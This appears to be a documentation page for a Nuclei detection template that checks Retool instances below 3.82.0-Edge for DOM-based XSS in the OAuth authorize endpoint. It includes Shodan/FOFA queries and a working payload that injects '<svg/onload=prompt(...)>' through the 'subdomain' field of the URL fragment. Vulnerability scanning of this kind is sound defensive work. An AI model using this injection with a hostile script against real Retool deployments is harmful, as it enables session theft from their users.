Retool <3.82.0 Edge OAuth Authorize - DOM Based XSS
ID: retool-dom-xss
Severity: high
Author: rootxharsh,iamnoooob,pdresearch
Tags: headless,retool,dom,xss
Description
Section titled “Description”Retool versions less than 3.82.0-Edge are vulnerable to a DOM-based XSS vulnerability in the OAuth authorization flow.
YAML Source
Section titled “YAML Source”id: retool-dom-xss
info: name: Retool <3.82.0 Edge OAuth Authorize - DOM Based XSS author: rootxharsh,iamnoooob,pdresearch severity: high description: | Retool versions less than 3.82.0-Edge are vulnerable to a DOM-based XSS vulnerability in the OAuth authorization flow. metadata: verified: true max-request: 1 shodan-query: title:"Retool" fofa-query: body="Retool" tags: headless,retool,dom,xss
variables: random_int: '{{rand_int(1,1000)}}'
headless: - steps: - args: url: '{{BaseURL}}/oauth/authorize#%7B%20"redirectUri":%20"zzz",%20"resourceId":%20"fff",%20"resourceName":%20"aa",%20"resourceType":%20"azz",%20"userEmail":%20"[email protected]",%20"userFirstName":%20"zzz",%20"userLastName":%20"zzff",%20"xsrfToken":%20"x","subdomain":"aaa<svg/onload=prompt({{random_int}})>aaaa","accessToken":"ab"%20%7D' action: navigate
- action: waitdialog name: subdomain_object_dom
matchers-condition: and matchers: - type: dsl dsl: - subdomain_object_dom == true - subdomain_object_dom_message == random_int condition: and# digest: 4b0a00483046022100876be88889b2e51c152cf7e73e82863ab576633fc7e7a37c0870be8e4491f9e50221008e4431d3b1256e848c69c0a6647869549b78d0b7f145c204632a89a1dbc3f8b5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "headless/vulnerabilities/retool/retool-dom-xss.yaml"